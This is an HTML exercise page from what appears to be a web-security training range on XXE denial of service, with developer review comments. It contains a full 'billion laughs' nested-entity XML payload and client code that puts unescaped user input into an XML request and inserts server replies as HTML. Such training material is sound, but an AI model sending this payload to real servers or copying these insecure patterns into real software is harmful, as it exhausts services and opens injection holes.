<!DOCTYPE html>
<html>
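<head>
    <meta charset="UTF-8">
    <!-- The title was empty; it now repeats the page's own banner text. -->
    <title>XXE DDos</title>
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport"
          content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi">
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="../../../statics/xadmin/css/font.css">
    <link rel="stylesheet" href="../../../statics/xadmin/css/xadmin.css">
    <link rel="stylesheet" href="../../../statics/ceber/css/mardown-css-jwsky.css">
    <link rel="stylesheet" href="../../../statics/ceber/css/highlight/arduino-light.css">

    <!-- All scripts come from the application's own static tree (relative paths), not a CDN.
         The inline script at the end of the page uses jQuery ($), layui, showdown (Markdown to
         HTML) and hljs (syntax highlighting) from these files. -->
    <script src="../../../statics/xadmin/js/jquery.min.js"></script>
    <script src="../../../statics/xadmin/lib/layui/layui.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/showdown.min.js" charset="utf-8"></script>
    <!-- NOTE(review): ceber.js is not visible here; presumably shared range helpers. Confirm. -->
    <script src="../../../statics/ceber/js/ceber.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/highlight.pack.js" charset="utf-8"></script>

    <style>
        /* Tab panes: no padding except a small gap under the tab strip. */
        .layui-tab-content {
            padding: 0px;
            padding-top: 10px;
        }

        /* Space between the comment input and the publish button. */
        input {
            margin-bottom: 10px;
        }
    </style>
</head>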
<body>
<div class="x-body layui-anim layui-anim-up">
    <!-- Banner naming the exercise. -->
    <blockquote class="layui-elem-quote">XXE DDos</blockquote>
    <!-- Challenge area: a comment box. getXml() wraps the typed text in an XML document and
         ceberSubmitXXE() posts it; the server's reply is written into the rs-* rows below. -->
    <fieldset class="layui-elem-field">
        <legend>题目区</legend>
        <div class="layui-field-box">
            <div class="layui-row" style="vertical-align:bottom">
                <!-- NOTE(review): the form is never submitted natively. ceberSubmitXXE() reads
                     the action, method and the non-standard contentType attribute into variables
                     it never uses, and posts to the hard-coded "/ceber-range/xxe/xxe3" instead of
                     the action below ("/ceber-range/xxe/xxe1"). Confirm which endpoint this page
                     is meant to exercise. -->
                <form class="layui-form" method="POST" name="form" contentType="application/xml"
                      action="/ceber-range/xxe/xxe1">
                    <!-- NOTE(review): no script on this page writes to commentXml; it may be
                         used by ceber.js or be a leftover. Verify. -->
                    <input type="hidden" name="commentXml" id="commentXml"/>
                    <!-- Free-text comment; its value is placed into the XML body unescaped. -->
                    <input type="text" name="commentStr" id="commentStr" placeholder="请输入留言" autocomplete="off"
                           class="layui-input">
                    <!-- type="button" keeps the browser from submitting the form itself. -->
                    <button type="button" class="layui-btn layui-btn-mini" onclick="ceberSubmitXXE(this);">发布</button>
                </form>
            </div>
            <!-- comment-div: only referenced by a .val('') call in the success handler. -->
            <div class="layui-row" id="comment-div">
            </div>
            <!-- Response rows. Each receives one field of the JSON reply through jQuery .html(),
                 so the reply is interpreted as markup, not as plain text. -->
            <div class="layui-row" id="rs-message">
            </div>
            <div class="layui-row" id="rs-body">
            </div>
            <div class="layui-row" id="rs-hit">
            </div>
            <div class="layui-row" id="rs-bak">
            </div>
        </div>
    </fieldset>
    <!-- Solution area: five layui tabs (description, hints, source, attack method, defence).
         The text inside each pane is only a placeholder; the inline script at the end of the
         page replaces it on load with HTML rendered by showdown from the hidden element whose
         id is the pane id plus "_source". -->
    <fieldset class="layui-elem-field">
        <legend>解题区</legend>
        <div class="layui-tab layui-field-box">
            <ul class="layui-tab-title">
                <li class="layui-this">描述</li>
                <li>提示</li>
                <li>源代码</li>
                <li>攻击方法</li>
                <li>防御</li>
            </ul>
            <div class="layui-tab-content">
                <div class="layui-tab-item layui-show" id="mubiao">描述</div>
                <div class="layui-tab-item" id="tishi">提示</div>
                <div class="layui-tab-item" id="yuandaima">源代码</div>
                <div class="layui-tab-item" id="gongjifangfa">攻击方法</div>
                <div class="layui-tab-item" id="fangyu">防御</div>
            </div>
        </div>
    </fieldset>

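    <!--
      Hidden Markdown sources for the five tabs. Each <code> wraps one
      <script type="text/html"> element so the browser keeps the Markdown as raw text.

      This region had been damaged by a formatter: several tags were split into pieces
      ("< code", "< /code>", "< script >"), so the tishi, gongjifangfa and fangyu elements,
      the closing </div> and </body>, and the page's inline <script> were no longer parsed
      as tags. The tags are restored here.

      The script tags and the Markdown stay at column 0 on purpose: Markdown treats lines
      indented by four or more spaces as a code block, and a loader that strips a fixed
      48-character prefix with substr(48) expects exactly one newline plus the
      47-character script tag after each <code> start tag.
    -->
    <code id="mubiao_source" style="display:none">
<script type='text/html' style='display:block'>
对服务器进行DDos攻击

</script>
    </code>

    <code id="tishi_source" style="display:none">
<script type='text/html' style='display:block'>


</script>
    </code>

    <!--
      Sample document shown in the source tab: nine nested entity levels, each referencing
      the previous level ten times, so &lol9; expands to 10^9 copies of "lol" (about 3 GB of
      text) in a parser that expands internal entities without limits.
    -->
    <code id="yuandaima_source" style="display:none">
<script type='text/html' style='display:block'>
```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```

</script>
    </code>

    <code id="gongjifangfa_source" style="display:none">
<script type='text/html' style='display:block'>

</script>
    </code>

    <!--
      NOTE(review): the defence tab has no content yet. Points a write-up for this exercise
      would normally cover: make the server's XML parser refuse DOCTYPE declarations (or
      disable DTD processing), cap the number of entity expansions and the expanded size,
      and bound request size and parse time so one request cannot exhaust memory or CPU.
    -->
    <code id="fangyu_source" style="display:none">
<script type='text/html' style='display:block'>


</script>
    </code>
    <blockquote class="layui-elem-quote layui-quote-nm">持续集成</blockquote>
</div>
</body>

<script>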
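            // On DOM ready: load the layui modules, then render each tab's Markdown source.
            $(function () {
                // Load the popup layer module. `layer` and `element` are assigned without
                // `var`, so they become globals; kept that way in case other scripts use them.
                layui.use(['form', 'element'],
                    function () {
                        layer = layui.layer;
                        element = layui.element;
                    });
                var converter = new showdown.Converter();
                // Pane ids; the hidden Markdown for pane X lives in #X_source.
                var tabIds = ["mubiao", "tishi", "yuandaima", "gongjifangfa", "fangyu"];
                $.each(tabIds, function (i, tabId) {
                    // Read the Markdown from the inner <script type="text/html"> element
                    // instead of cutting a fixed 48-character prefix off the wrapper's HTML:
                    // the fixed offset broke as soon as the wrapper's whitespace changed, and
                    // a missing source element made the whole callback throw.
                    var markdown = $("#" + tabId + "_source").children("script").html();
                    if (typeof markdown === "string") {
                        // showdown passes raw HTML through and the result is inserted as
                        // markup, so these sources must stay static page content and never
                        // carry user-supplied text.
                        $("#" + tabId).html(converter.makeHtml(markdown));
                    }
                });
            });

        // Registered after the renderer above, so it runs once the <pre><code> blocks exist.
        $(document).ready(function () {
            $('pre code').each(function (i, block) {
                hljs.highlightBlock(block);
            });
        });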


        /**
         * Builds the XML request body from the comment input.
         *
         * NOTE(review): the input value is concatenated as-is, without XML escaping, so a
         * `<` or `&` typed into the box changes the structure of the document that is sent.
         * Escaping here would only tidy the client; the request body is fully controlled by
         * the sender, so the server-side parser is where the hardening has to happen.
         *
         * @returns {string} the XML document as a single string
         */
        function getXml() {
            var text = $("#commentStr").val();
            var pieces = [
                '<?xml version="1.0"?>',
                '<comment>',
                '  <text>' + text + '</text>',
                '</comment>'
            ];
            return pieces.join('');
        }

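        /**
         * Click handler of the publish button: posts the comment as an XML body and writes
         * the fields of the JSON reply into the result rows.
         *
         * @param {Element} e the clicked button (passed as `this` from the onclick attribute)
         * @returns {boolean} always false
         */
        function ceberSubmitXXE(e) {
            // The old lookup looped `while (parent.tagName == "form")`. tagName is upper-case
            // in HTML documents, so the loop never ran and the result was simply the button's
            // parent. closest() finds the enclosing form wherever the button sits; the parent
            // node stays as fallback so the previous result is kept when there is no form.
            var enclosingForm = $(e).closest('form')[0];
            // `curForm` was an implicit global before; it is still assigned in case other
            // scripts read it.
            curForm = enclosingForm ? enclosingForm : e.parentNode;
            // The form's action, method and contentType attributes and its serialized fields
            // were read into locals that nothing used; those reads are dropped. The request
            // target and content type below are fixed, independent of the form markup.
            $.ajax({
                url: "/ceber-range/xxe/xxe3",
                method: "POST",
                contentType: "application/xml",
                data: getXml(),
                success: function (data) {
                    console.log(data);
                    // `rs` is an implicit global as well; kept for compatibility.
                    rs = data;
                    // NOTE(review): every field is inserted with .html(), i.e. parsed as
                    // markup. If the server echoes any part of the submitted comment in these
                    // fields, that text runs as HTML in this page; .text() would be the safe
                    // choice unless the reply is meant to contain markup. Confirm with the
                    // endpoint's response format before changing it.
                    $("#rs-message").html(rs.code + " " + rs.message);
                    $("#rs-body").html(rs.body);
                    $("#rs-hit").html(rs.hit);
                    $("#rs-bak").html(rs.bak);
                    // NOTE(review): #comment-div is a <div>, so .val('') has no effect here;
                    // presumably the intent was to clear the #commentStr input. Verify.
                    $("#comment-div").val('');
                },
                error: function (jqXHR, textStatus, errorThrown) {
                    /* Error handling: log only, nothing is shown to the user. */
                    console.error(jqXHR);
                    console.error(textStatus);
                    console.error(errorThrown);
                }
            });
            return false;
        }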

        </script>
</html>